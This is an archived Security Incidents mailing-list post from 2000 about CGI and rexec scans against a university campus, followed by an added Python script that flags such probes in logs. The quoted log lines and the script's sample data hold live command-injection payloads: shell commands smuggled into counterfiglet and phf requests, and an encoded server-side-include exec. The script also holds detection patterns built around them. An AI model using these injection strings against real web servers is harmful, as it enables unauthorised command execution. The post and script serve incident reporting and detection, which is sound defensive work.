Security Incidents mailing list archives

Scans from udel.edu and tue.nl


From: jose () BIOCSERVER BIOC CWRU EDU (Jose Nazario)
Date: Tue, 21 Mar 2000 11:59:21 -0500


Hi,

         [Local hostnames have been munged, outside addresses are real]

I wanted to write a quick note to you guys about two sets of web scans we
have seen on the CWRU campus these past few days. The first is from the
University of Delaware, with some classic cgi-bin attempts:

strauss.udel.edu - - [19/Mar/2000:11:41:23 -0500] "GET /cgi-bin/counterfiglet/nc/f=;echo;echo%20{_begin-counterfiglet_};uname%20-a;id;w;echo%20{_end-counterfiglet_};echo HTTP/1.0" 404 301
strauss.udel.edu - - [19/Mar/2000:21:44:53 -0500] "POST /cgi-bin/test-cgi HTTP/1.0" 404 210
strauss.udel.edu - - [20/Mar/2000:18:47:53 -0500] "POST /cgi-bin/perl HTTP/1.0" 404 206
strauss.udel.edu - - [21/Mar/2000:00:31:37 -0500] "POST /cgi-bin/sh HTTP/1.0" 404 204
strauss.udel.edu - - [21/Mar/2000:01:16:06 -0500] "GET /cgi-bin/query?x=%3C%21%2D%2D%23%65%78%65%63%20%63%6D%64%3D%22%2F%75%73%72%2F%62%69%6E%2F%69%64%22%2D%2D%3E HTTP/1.0" 404 207

The second set is from the Netherlands, who just got back to me this
morning regarding two compromised accounts. They also tried some cgi-bin
scans to gain access to the machine, as well as some rexec attempts and
what appears to be a trojan horse access attempt:

webcache.tue.nl - - [19/Mar/2000:00:49:12 -0500] "POST /cgi-bin/perl HTTP/1.0" 404 206
webcache.tue.nl - - [19/Mar/2000:00:49:12 -0500] "POST /cgi-bin/phf?Qname=x%0a/bin/sh+-s%0a HTTP/1.0" 404 205

Mar 19 04:23:04 server kernel: TCP connection rejected from 131.155.69.100, port 5556
Mar 19 05:48:22 server kernel: TCP connection rejected from 131.155.69.100, port 512
Mar 19 08:28:46 server kernel: TCP connection rejected from 131.155.69.100, port 512

And on another machine:

Mar 18 23:51:35 4C:workstation rexecd[14591]: refused connect from svstud.win.tue.nl
Mar 19 01:03:14 4C:workstation rexecd[14635]: refused connect from svstud.win.tue.nl
Mar 19 01:49:15 4C:workstation rexecd[14655]: refused connect from svstud.win.tue.nl
Mar 19 04:28:21 4C:workstation rexecd[14731]: refused connect from svstud.win.tue.nl
Mar 19 05:36:30 4C:workstation rexecd[14774]: refused connect from svstud.win.tue.nl
Mar 19 05:39:34 4C:workstation rexecd[14775]: refused connect from svstud.win.tue.nl
Mar 19 08:20:00 4C:workstation rexecd[14857]: refused connect from svstud.win.tue.nl
Mar 19 09:23:25 4C:workstation rexecd[14897]: refused connect from svstud.win.tue.nl

Both were campus wide probes for web access via cgi-bin and rexecd access
(port 512/TCP).

It's likely that other readers have seen these problems as well.

jose nazario                                    jose () biochemistry cwru edu
PGP fingerprint: 89 B0 81 DA 5B FD 7E 00  99 C3 B2 CD 48 A0 07 80
Public key available at http://biocserver.cwru.edu/~jose/pgp-key.asc
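The probes quoted in the post can be picked out of web-server and syslog lines automatically rather than by eye. The script below is an added example written for this archive page, not code from Jose's post or from any of the sites named in it. It assumes the web lines are in Apache common log format and the syslog lines have the two shapes quoted above; the set of probed CGI program names is taken from the post, the request-level checks (URL-decoding before inspection, looking for an SSI `exec` directive and for shell metacharacters) are the detection logic this example adds, and the sample lines embedded at the bottom are copied from the post's own logs.

```python
"""Flag CGI probe attempts and rexec connection attempts in web and syslog lines."""
import re
from collections import defaultdict
from urllib.parse import unquote

# Apache common log format: host ident user [time] "method target proto" status size
APACHE_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)$'
)
# The two syslog line shapes quoted in the post.
KERNEL_REJECT_RE = re.compile(
    r'kernel: TCP connection rejected from (?P<host>[\d.]+), port (?P<port>\d+)')
REXECD_RE = re.compile(r'rexecd\[\d+\]: refused connect from (?P<host>\S+)')

# CGI program names that the post shows being probed. A request for one of
# these on a server that does not install it is a scan whatever the status.
PROBED_CGI_PROGRAMS = {"phf", "test-cgi", "perl", "sh", "counterfiglet"}


def classify_request(target):
    """Return the reasons a request target looks like a CGI probe (empty if none).

    The target is URL-decoded first so encoded payloads (%3C%21 for '<!',
    %0a for newline) are inspected in clear rather than as hex.
    """
    decoded = unquote(target)
    path, _, _query = decoded.partition("?")
    parts = path.split("/")
    reasons = []
    if len(parts) > 2 and parts[1] == "cgi-bin" and parts[2] in PROBED_CGI_PROGRAMS:
        reasons.append(f"request for known-probed CGI program {parts[2]}")
    if "<!--#exec" in decoded:
        reasons.append("server-side include exec directive in request")
    if any(ch in decoded for ch in ";|\n`"):
        reasons.append("shell metacharacter in request")
    return reasons


def analyze(lines):
    """Group findings by source host across web-log and syslog lines.

    Returns {host: [finding, ...]}; lines that match nothing are ignored.
    """
    findings = defaultdict(list)
    for line in lines:
        m = APACHE_RE.match(line)
        if m:
            for reason in classify_request(m.group("target")):
                findings[m.group("host")].append(f"{m.group('method')} {reason}")
            continue
        m = KERNEL_REJECT_RE.search(line)
        if m:
            port = int(m.group("port"))
            service = "rexec (512/TCP)" if port == 512 else f"port {port}"
            findings[m.group("host")].append(f"rejected TCP connection to {service}")
            continue
        m = REXECD_RE.search(line)
        if m:
            findings[m.group("host")].append("rexecd refused connect")
    return dict(findings)


# Sample input: lines copied from the post, rejoined where the mailer wrapped them.
SAMPLE_LINES = [
    'strauss.udel.edu - - [19/Mar/2000:11:41:23 -0500] "GET /cgi-bin/counterfiglet/nc/f=;echo;echo%20{_begin-counterfiglet_};uname%20-a;id;w;echo%20{_end-counterfiglet_};echo HTTP/1.0" 404 301',
    'strauss.udel.edu - - [19/Mar/2000:21:44:53 -0500] "POST /cgi-bin/test-cgi HTTP/1.0" 404 210',
    'strauss.udel.edu - - [20/Mar/2000:18:47:53 -0500] "POST /cgi-bin/perl HTTP/1.0" 404 206',
    'strauss.udel.edu - - [21/Mar/2000:00:31:37 -0500] "POST /cgi-bin/sh HTTP/1.0" 404 204',
    'strauss.udel.edu - - [21/Mar/2000:01:16:06 -0500] "GET /cgi-bin/query?x=%3C%21%2D%2D%23%65%78%65%63%20%63%6D%64%3D%22%2F%75%73%72%2F%62%69%6E%2F%69%64%22%2D%2D%3E HTTP/1.0" 404 207',
    'webcache.tue.nl - - [19/Mar/2000:00:49:12 -0500] "POST /cgi-bin/perl HTTP/1.0" 404 206',
    'webcache.tue.nl - - [19/Mar/2000:00:49:12 -0500] "POST /cgi-bin/phf?Qname=x%0a/bin/sh+-s%0a HTTP/1.0" 404 205',
    'Mar 19 04:23:04 server kernel: TCP connection rejected from 131.155.69.100, port 5556',
    'Mar 19 05:48:22 server kernel: TCP connection rejected from 131.155.69.100, port 512',
    'Mar 19 08:28:46 server kernel: TCP connection rejected from 131.155.69.100, port 512',
    'Mar 18 23:51:35 4C:workstation rexecd[14591]: refused connect from svstud.win.tue.nl',
    'Mar 19 01:03:14 4C:workstation rexecd[14635]: refused connect from svstud.win.tue.nl',
]

if __name__ == "__main__":
    for host, items in analyze(SAMPLE_LINES).items():
        print(f"{host}: {len(items)} finding(s)")
        for item in items:
            print(f"  - {item}")
```

The decode-then-inspect order matters: the last udel.edu request is only recognisable as an SSI `exec` attempt once its hex escapes are turned back into `<!--#exec cmd="/usr/bin/id"-->`, and the phf request only shows its embedded newline after `%0a` is decoded. Because the checks run on the request target and not on the status code, the 404s in the post are still reported; a server that happens to install one of the probed programs would see the same requests with 200s, which is the case where the alert matters most.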

